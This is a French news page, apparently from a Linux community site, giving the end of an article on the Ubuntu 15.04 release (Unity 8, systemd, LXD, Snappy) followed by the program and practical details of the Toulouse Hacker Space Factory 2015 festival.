    Le bureau par défaut d'Ubuntu, Unity 7, continue d'être maintenu, en attendant que Unity 8 soit prêt à le remplacer sur le poste de travail.

    Quelques bugs supplémentaires ont été corrigés et quelques réglages au niveau des animations ont permis d'améliorer quelque peu la fluidité de l'ensemble.
    On notera que les menus intégrés localement (apparus en tant qu'option dans Ubuntu 14.04) sont maintenant utilisables avec les fenêtres qui ne sont pas au premier plan.

    Du côté de Compiz (dont Unity 7 n'est qu'un plugin), on notera un meilleur support de GNOME2/Mate. Cela tombe à pic, puisqu'une nouvelle variante officielle, Ubuntu Mate, sort justement pour la première fois avec cette version 15.04.

    Cette nouvelle version de Compiz devrait également mettre fin aux problèmes de fluidité avec le pilote propriétaire Nvidia. Pour la petite histoire, et pour appâter les trolls dans les commentaires, un patch pour ce problème avait été fourni par Nvidia il y a plus d'un an mais celui-ci n'avait pas pu être inclus car l'auteur n'avait pas signé de CLA. C'est maintenant chose faite.

    Unity 8

    Le successeur de Unity 7 a passé l'épreuve du feu : il est embarqué au sein du premier Ubuntu Phone en vente libre, le Bq Aquaris 4.5.

    Les gros travaux concernant Unity 8 et Mir sur les téléphones et tablettes sont par conséquent terminés.

    Pendant ces derniers mois, les développeurs ont donc pu s'atteler plus sérieusement au développement d'un véritable mode « ordinateur de bureau » pour Unity 8.

    L'objectif est d'obtenir une interface dite « convergente », c'est à dire une interface capable de s'adapter dynamiquement à l'environnement dans lequel elle fonctionne (présence ou non d'un clavier ou d'une souris, taille de l'écran…).

    Dans cet optique, on notera tout particulièrement l'implémentation du mode multi-fenêtres et de grandes améliorations en ce qui concerne Xmir.

    Mieux qu'un long discours, cette impressionnante vidéo montre assez bien le statut des développements.
    On peut y voir une tablette sous Ubuntu (Mir/Unity 8) faire fonctionner des applications X11 classiques telle que LibreOffice. Plus intéressant, le simple fait d'associer une souris Bluetooth fait basculer l'interface dans un mode fenêtré.
    La même démonstration est ensuite reproduite sur un Nexus 4, c'est à dire un téléphone.

    Kubuntu - KDE SC

    La variante officielle d'Ubuntu basée sur KDE, Kubuntu, introduit un changement majeur : Plasma 5 est maintenant le bureau par défaut.

    Système Passage à systemd

    Suite à un travail de fond en collaboration avec Debian (qui vient de faire le grand saut à l'occasion de sa nouvelle version), systemd a finalement remplacé Upstart en tant que PID 1.

    Upstart reste utilisé sur les téléphones pour le moment, pour cause de noyaux trop anciens pour systemd.
    De plus, Upstart n'a pas complètement disparu des autres formats puisqu'il est toujours utilisé pour gérer les sessions utilisateurs.

    Autour de LXC LXC

    LXC est maintenant en version 1.1. Cette nouvelle mouture apporte principalement un support complet de systemd, que ce soit au niveau de l’hôte ou du conteneur.

    Cette nouvelle version introduit également un nouveau composant intéressant : LXCFS. Il s'agit d'un système de fichier en espace utilisateur (Fuse) qui permet d'exposer une version filtrée de /proc dans les conteneurs. Cela permet d'améliorer l'isolation et de faire fonctionner de façon fiable des outils de base comme top ou free. LXCFS est par exemple nécessaire pour faire fonctionner systemd au sein d'un conteneur.

    LXD

    Ubuntu 15.04 intègre pour la première fois LXD, un nouveau projet ayant pour but de fournir un véritable hyperviseur pour les conteneurs LXC.

    Il apporte des choses sympathiques comme les migrations live et la prise d'instantanés. LXD se dit également « sécurisé par défaut », principalement parce qu'il automatise tout le nécessaire pour ne pas avoir à lancer de conteneur en root.

    Le tout est enrobé d'une API REST, ce qui permet à l'ensemble d'être intégré dans d'autres projets comme OpenStack Nova et ainsi de gérer des conteneurs massivement, avec les mêmes outils « haut niveau » que ce qui existe actuellement pour les machines virtuelles.

    LXD est un projet jeune (6 mois) développé en Go à l'initiative de Canonical. La version 0.7 intégrée dans Ubuntu 15.04 n'est pas encore jugée prête pour la production, mais les utilisateurs sont invités à expérimenter.

    Au delà du projet en lui-même, qui semble prometteur, le mode de développement de LXD est très singulier pour un projet initié par Canonical. LXD est en effet développé sur GitHub et est sous licence Apache. De plus, les contributions extérieures ne nécessitent pas la signature d'un accord de contribution (CLA).

    Tous les projets de Canonical étaient jusqu'à présent hébergés dans des dépôts bzr sur Launchpad et étaient sous licence (L)GPLv3 assorti du fameux CLA.

    Sur le blog de Dustin Kirkland, on apprend — même si on pouvait s'en douter — que des débats internes font rage sur ces sujets. Les développeurs ont dû se battre pour que le développement de LXD soit aussi tourné vers l'extérieur, au potentiel détriment de l'entreprise.

    Qui sait, cette expérience en appellera peut-être d'autres.

    Snappy

    Ubuntu 15.04 propose Snappy pour la première fois en version stable. Cette nouvelle technologie est un excellent exemple de la stratégie de convergence d'Ubuntu.

    À l'origine, il n'y avait qu'un « simple » problème à résoudre : les téléphones et tablettes ont besoin d'une système de mise à jour plus adapté qu'un classique apt-get (ou autre système de gestion de paquet traditionnel, type RPM, pacman et autres). La nouvelle architecture devait permettre :

    • des opérations transactionnelles : une interruption impromptue lors d'une opération (coupure de courant…) ne doit pas laisser le système dans un état incohérent ;
    • une utilisation transparente pour l'utilisateur (vous avez déjà vu le regard de désespoir d'un de vos parents quand une mise à jour demande s'il faut conserver l'ancienne version d'un fichier de configuration ? Moi oui) ;
    • une optimisation des besoins en bande passante : seul le différentiel d'une mise à jour doit être téléchargé ;
    • une séparation complète du système « de base » des applications, afin de pouvoir généraliser le sandboxing. Cela permet aussi d'éviter le besoin d'audit manuel de chaque nouveau paquet proposé pour inclusion dans le magasin d'applications.

    Tout ceci fonctionne aujourd'hui en production sur les premiers « Ubuntu phone ».

    Seulement, on voit bien que ce système pourrait tout à fait avoir sa place dans l'embarqué en général ou dans le cloud. Un vendeur de drones, d'objets connectés ou simplement l'administrateur d'un gros parc de machines pourrait être très intéressé par le concept d'une Ubuntu minimale que l'on puisse mettre à jour de façon simple et transactionnelle. Et l'idéal serait de pouvoir installer/mettre à jour/supprimer des services d'une façon tout aussi simple et sécurisée. Un peu à la manière de ce que peut faire un Docker, mais étendu au système entier.

    Snappy est exactement cela : la généralisation du besoin originel des téléphones/tablettes à l'ensemble de l'embarqué, du cloud et peut-être même plus à l'avenir.

    Des ISO d'Ubuntu Core en version « Snappy » sont disponibles. Un outil en ligne de commande, snappy, permet de simplement rajouter des applications disposant de paquets Snappy. Par défaut, chaque application est isolée des autres et ne peut pas modifier le système de base.

    Il est également possible de rajouter des framework, comme Docker. Ceux-ci sont aussi des paquets Snappy, mais ils sont moins confinés. Ils permettent de modifier le système et doivent donc, contrairement aux applications classiques, subir un audit manuel avant de pouvoir intégrer le dépôt officiel de Snappy.

    Ubuntu 15.10

    Mark Shuttleworth n'a pas encore annoncé le nom de code de la prochaine version d'Ubuntu. Nous savons juste que son acronyme sera « WW ».

    Il est encore trop tôt pour connaître les principaux objectifs de cette prochaine version. Sans trop se mouiller, on peut cependant supposer une accélération du développement de la version pour ordinateurs de bureau de Unity 8 et Mir. Il serait peut-être optimiste de penser à un remplacement de Unity 7 par défaut, mais le bureau dans sa version next devrait commencer à être utilisable au quotidien par les utilisateurs avancés.

    Télécharger ce contenu au format Epub

    Lire les commentaires

    Toulouse Hacker Space Factory 2015

    30 avril, 2015 - 12:00

    Après les rumeurs floues, après les prévisions incertaines, voici enfin le programme presque complet du THSF 2015. Il se déroulera du 14 au 17 mai, dans le hangartistique (nimage) du collectif d'artistes autogéré Mixart-Myrys. Le thème de cette édition est « Less is More », que l'on peut approximativement traduire par « ça va quand même bien se passer », et nos amis bretons seront là pour nous aider.

    Sommaire Thématique

    La mise en commun et la libre circulation des connaissances est une question récurrente qui est relancée à chaque apparition d’une nouvelle technologie, et ce, depuis l’invention de l’imprimerie et de la rule #34. C’est aujourd'hui une évidence interprétée de façons diverses voire opposées et cette notion du partage est particulièrement défendue dans les hackerspaces.

    Pour cette nouvelle édition du Toulouse Hacker Space Factory, nous allons prolonger les thématiques liées aux nouvelles et/ou anciennes technologies et aux arts numériques, en tentant une approche par le biais de la croissance dont on nous parle si trop souvent. Ou plutôt de la décroissance, la mécroissance (Ars Industrialis), l’altercroissance et les croissants au beurre…

    Less Is More, la simplicité plutôt que la complexité. Ou comment faire mieux avec moins ? Comme chaque année, la priorité est donnée à la diversité des projets présentés et à la diversification des publics, via des propositions innovantes dans le rapport entre les artistes et leurs publics.

    Minimalisme, alternatives, initiatives innovantes, nouveaux modèles de consommations, détournements, recyclages de technologies « anciennes »… nous naviguerons dans ces sphères expérimentales, dans un esprit d’échanges et de découvertes, festif, convivial et houblonné (nimage).

    Installations
    • Démorétro : Vieilles machines, aka ordinosaures, cpc6128, mo5, Amiga, Blade100, SGI, pdp11…
    • émeute codelab, « branche-toi avec nous » ;
    • machins divers, faits par on ne sait qui ;
    • les petites briques Internet de Tetaneutral ;
    • body bouddhisme, lévitation assistée par ordinateur ;
    • Photomaton guidé par RaspPi (PauLLa)&nbps;;
    • Poussy Draama : « Le Cabinet Mobile du Docteure Duchesne » ;
    • Pierre Grange-Praderas : Le rucher connecté ;
    • cabinet de curiosités du Labomedia ;
    • Stéphane Bissieres, Human likes ;
    • Magali Marc, feedback vidéo&nbps;;
    • Previmeteo, stations météo professionnelles sous Arduino ;
    • démoscène Hackbar - ultimate sound dans le vrai monde - SID required.
    Programme Jeudi 14 Vendredi 15
    • Conférences :
      • Philippe Langlois (LTE et VoLTE Pwns : insécurité à long terme) ;
      • Spider Alex (retour sur le Trans Hack Festival) ;
      • Sylvain Courrèges (services de renseignement et lutte anti-subversive) ;
      • Reporters sans frontières & fo0 & Grégoire Pouget (opération Colateral Freedom, hacktivisme au Moyen-Orient, lois de renseignement, et de programmation militaire) ;
      • Médiapart & Jérôme Hourdeaux & fo0 (table ronde sujets d’actualité) ;
    • Ateliers : Accretion textile de MadPhoenix / Initiation Arduino / Démoscène / ArboreSign ;
    • Concerts :
    • Performances :
    Samedi 16
    • Conférences :
      • YunoHost (en 2015, est-ce que Madame Michu peut s’auto-héberger ?)
      • Renaud Lifchitz (l’ordinateur quantique en pratique et ses impacts sur la cryptographie, sous réserve installation de DebianSlackware sur un ordinateur quantique ;-)) ;
      • Marc-Olivier Killijian (géolocalisation & geoprivacy) ;
      • Lord Epsylon (les réalités physique et politiques derrière Internet) ;
      • Jérémie Zimmermann (droits et libertés sur Internet) ;
    • Ateliers : Démoscène OpenGL / Autohébergement / Initiation Arduino / Lockpicking / LSF / Kits Tetalab / Sign3D / Drawall.cc ;
    • Concerts :
    • Performances :
      • Lionel D. (suicide à l'homéopathie) ;
      • Margot Lançon & Miadana Randriamorasata (avatar) ;
      • Guillaume « same player shoot again ».
    Dimanche 17
    • Conférences :
      • Damien Cauquil (reverse matériel de clavier sans-fil) ;
      • Julien Bethencourt (la gouvernance collaborative - Trois expériences en entreprise) ;
      • Lora Fabian - Mathieu <geb> Goessens (Telecom Bretagne) ;
    • Ateliers : Grafcet & Arduino / Lockpicking / Kits Tetalab / Initiation Arduino / Démoscène ;
    • Concerts : Scène ouverte sur le quai ;
    • Performances : Apéro de cloture, forensic.
    Infos pratiques

    Voici maintenant quelques petits RTFM afin de mieux vous aider à profiter de ces quatre jours de hacking dans la joie et la bonne humeur.

    Vous pouvez avoir un programme plus précis (et éventuellement actualisé (avec les bons horaires (enfin, j'espère)(et les bons liens(si c'est possible))(nimage))) sur le site de Myrys ou du Tetalab :

    Mixart-Myrys est situé à côté des Ponts-Jumeaux à Toulouse, au 12 rue Ferdinand Lassalle.

    • Métro ligne B arrêt "Canal du Midi" ;
    • bus ligne 16 arrêt "Suisse" ;
    • bus ligne 15 arrêt "Tricou" ;
    • pour les marins bretons : 43°37'06 N - 1°25'14 E.

    Il y aura des possibilités de petite restauration gourmande sur place. Certaines parties de l'évènement seront retransmises en direct sur Radio Myrys. Aucun artiste ne sera maltraité pendant ces quatre jours. Nous ignorons vraiment les conditions climatiques attendues. Certains ateliers nécessiteront une inscription préalable. Et comme tous les ans, quelques surprises (nimage) sont à prévoir…

    Télécharger ce contenu au format Epub

    Lire les commentaires